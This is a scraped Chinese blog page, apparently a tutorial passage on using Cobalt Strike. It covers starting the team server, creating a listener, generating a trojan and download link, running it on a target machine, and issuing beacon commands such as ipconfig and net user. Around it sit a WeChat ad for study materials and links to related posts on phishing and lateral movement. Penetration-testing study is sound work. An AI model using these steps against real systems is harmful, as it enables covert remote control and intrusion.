【网络安全】CobaltStrike 使用(1),神操作

最新推荐文章于 2024-04-28 04:43:59 发布
最新推荐文章于 2024-04-28 04:43:59 发布
阅读量277 收藏
点赞数 2
分类专栏: 2024年程序员学习 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79058515/article/details/137732627
版权 
sh start.sh

3、弹出连接界面,输入上面设置的密码 admin@123

三、创建监听器

1、创建监听器

2、点击最下面 Add

四、创建木马

1、创建攻击木马

2、选择上面创建的监听器

3、保存木马文件

4、创建木马链接

5、选择木马位置与生成的文件名

6、把生成的木马链接在 靶机上面运行

五、靶机运行木马

1、靶机下载木马并运行

六、CS服务端查看靶机上线

1、可以看到靶机已经上线了

2、进入靶机

3、成功出现命令行

4、查看靶机IP和用户

beacon> shell ipconfig

# 输出
[*] Tasked beacon to run: ipconfig
[+] host called home, sent: 39 bytes
[+] received output:

Windows IP 配置


以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::8c47:ccd9:f10f:1b8b%11
   IPv4 地址 . . . . . . . . . . . . : 10.3.0.234
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.3.0.1

隧道适配器 isatap.{28F326C2-E31B-42B2-B03F-F2E07F5FAD84}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :



beacon> net user

# 输出
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 105073 bytes
[+] received output:
Users for \\localhost:

Administrator (admin)
Guest
tomma

5、查看靶机桌面

beacon> desktop

# 输出
[+] host called home, sent: 16 bytes
[*] Tasked beacon to spawn VNC server


**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/a3017c2cf701d554d92c029c21930fec.png)
![img](https://img-blog.csdnimg.cn/img_convert/45e7cf733b00a1e05c28e6b4f2be3a61.png)
![img](https://img-blog.csdnimg.cn/img_convert/c2f6a97d215f12f5c7b1b030173cabed.png)
![img](https://img-blog.csdnimg.cn/img_convert/d2548502758654588ae0e40afc2c1b3a.png)
![img](https://img-blog.csdnimg.cn/img_convert/2d5a88e8bf0b836508ab3f629c96c120.png)
![img](https://img-blog.csdnimg.cn/img_convert/e128aa91dbaae45a1209bc5dd01129f2.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**

**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**

**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
![img](https://img-blog.csdnimg.cn/img_convert/5670f03be2a28c56a017937623a33ecd.png)



**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**

**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
[外链图片转存中...(img-zzlmgi6c-1713041955311)]
2301_79058515
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CS学习笔记】16、用户枚举三个关键步骤
TeamsSix 的 CSDN 空间
08-21 576
0x00 前言 用户枚举的三个关键步骤: 1、当前账号是否为管理员账号? 2、哪些账号是域管理员账号? 3、哪个账号是这个系统上的本地管理员账号? 0x01 管理员账号 第一个关键步骤,发现管理员账号。 如果想知道自己是否为管理员账号,可以尝试运行一些只有管理员账号才有权限操作的命令,然后通过返回结果判断是否为管理员。 其中一种方式是尝试列出仅仅只有管理员才能查看的共享列表,比如下面的 dir \\host\C$ 命令,如果可以看到一个文件列表,那么说明可能拥有本地管理员权限。 shell dir \\ho
一次偶然的CobaltStrike木马钓鱼邮件分析
博客地址 www.sec0nd.top
08-02 2115
前几天看到一篇关于近期钓鱼邮件的情况统计的文章,挺有意思然后在逛某威胁感知社区的时候,看到了一个恶意url,也挺有意思子域名伪装成某安全公司hhh,然后看了下与之有关的通信样本好家伙全是钓鱼文件,免杀做的还不错,最近几天不知道为什么异常频繁于是就点进去几个看了看,分析分析这种是怎么实现cs上线的(纯小白,勿喷) 下面所有分析均为在线沙箱进行测试的结果。......
内网渗透CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2803
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
Cobalt Strike渗透器详解
最新发布
2401_84281720的博客
04-28 631
还有一些其他的提权插件也还不错的,有兴趣可以下载试试;先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。 既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!由
CobaltStrike windows木马原理分析
好好学习,天天向上
12-28 1265
本文主要介绍CobaltStrike windows型木马的原理,同Meterpreter大体类似。不同之处有使用了命名管道,使用了http的相关api来下载payload,同样使用的peb来获取api的地址,最后的后门是一个反射型dll。
Cobaltstrike系列教程(二)Listner与Payload生成
热门推荐
J0o1ey Blog
08-01 1万+
0x000-前文 Cobaltstrike系列教程(一)简介与安装 https://bbs.ichunqiu.com/thread-52937-1-1.html PS:原本想完成日更目标的,但昨天在研究无线,就没更,今天加班~ 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下。 Listner(监...
CobaltStrike4.4.zip
09-15
Cobalt Strike是一款备受瞩目的渗透测试工具,主要用于模拟高级威胁行为,帮助网络安全专业人士进行红队操作和评估网络防御的有效性。在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关...
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款团队作战渗透测试器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序...
cobaltstrike4.3.zip
05-26
9. **隐秘通信**:Cobalt Strike使用多种隐蔽通信方法,如HTTP、HTTPS、DNS隧道等,以防止被防火墙或入侵检测系统阻断。 10. **实时反馈**:在渗透测试过程中,操作者可以实时查看目标系统的活动和响应,根据反馈...
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为...
cobaltstrike中文.rar
01-09
综上所述,Cobalt Strike 是一个强大的网络安全工具,对于红队操作和渗透测试至关重要。了解和掌握它的功能和使用方法,对于提升组织的安全防御能力具有重要意义。同时,对这一工具的滥用也应引起警惕,以防止成为...
CobaltStrike基础使用详解
weixin_53747497的博客
04-17 3374
Cobalt Strike(简称为CS)是一款团队作战渗透测试器,是一种可以用来进行横 向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可 以连接多个服务端,一个服务端也可以对应多个客户端连接。Connect to team server:连接服务端Disonnect from team server:断开当前服务端连接Configure Listeners:配置监听器Show sessions in graph view:展示会话列表。
内网渗透工具CobaltStrike使用教程详解
qq_50854662的博客
12-15 2386
内网渗透工具CobaltStrike使用教程详解
内网cobaltstrike使用教程
zkaqlaoniao的博客
12-15 857
系统环境:需要java环境Oracle Java 1.8,Oracle Java 11下载解压就可以使用首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地服务端启动命令windows运行teamserver.batlinux需要有足够权限,可以通过chmod +x teamserver 来提高权限这里为设定一个服务端,前面为服务端所在机器的ip ,后面为密码启动服务端后,我们就可以启动客户端去连接了。
团队协同作战渗透工具 CSCobalt Strike
有勇气的牛排博客
02-14 1万+
Cobalt Strike是一款渗透测试工具,常被称为CS器,从3.0开始不在使用Metaspoit的漏洞库,称为一个独立平台,它分为 客户端(可以是多个)和 服务端(一个)
内网渗透之CobaltStrike(CS)
Welcome To Myon'Blog !
01-10 2013
Cobalt Strike是一款内网渗透测试工具,常被业界人称为CS。Cobalt Strike 2.0版本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。客户端模式和服务端模式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有可能会出现一些细小的问题不过影响不大。
CobaltStrike使用-第一篇(基本使用方法、监听器、重定向器,以及通过重定向器隐藏C2服务器)
Love&Share
11-29 5058
文章目录基本使用客户端与服务器连接上线CS基本步骤基础设施监听器BeaconDNS BeaconDNS请求原理实验避坑重定器实验 Cobalt Strike是一款综合的渗透测试器 官网:https://www.cobaltstrike.com/ 工具的社区版是Armitage(一个MSF的图形化界面工具),CobaltStrike为收费商业版本 手册:CobaltStrike4.0用户手册_中文翻译、4.3、狼组版 Cobalt Strike使用C/S架构,Cobalt Strike的客户端连接到团.
CobaltStrike监听模块Listeners
bring_coco的博客
12-17 1967
类似于MSF中的exploi/multi/handler 步骤: 1.打开该模块 2.在这里填写名字,选择payload,HTTP Hosts和HTTP Host(Stager)一样即可,端口设置一个80 注意:在选择payload时候有些许不同,不如https相比http需要在profile中多加个几行代码,有关ssl证书的 成功创建 可以从本地服务器上看是否成功开启 3.搞一个链接,使用web脚本传递拿到一个会话,如下图 功能:它能在一个url上生成一个文件,然后在目标机上下载这个文件,然后执行
【CS学习笔记】19、代码执行的方式
TeamsSix 的 CSDN 空间
08-30 716
0x00 前言 实现代码执行的四个步骤: 1、与目标建立信任关系 2、复制可执行文件到目标上 3、在目标上运行可执行文件 4、实现对目标的控制 以上是根据视频教程中直译的结果,个人感觉其实这一节叫横向移动的方法更为合适。 0x01 创建可执行文件 创建可执行文件可以在 Cobalt Strike 的 Attack -> Packages -> Windows Executable(s) 处进行创建。 如果用于内网中的横向移动,那么强烈建议使用 SMB Beacon,SMB Beacon 就是为
利用Cobalt Strike进行对手仿真的网络安全渗透测试
对手仿真结合 Cobalt Strike使用,为网络安全专业人员提供了一种强大的评估和提升防御能力的手段。它不仅能够模拟现实世界的威胁,还能帮助组织更好地理解自身的安全状况,及时发现并修复潜在的安全隐患。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值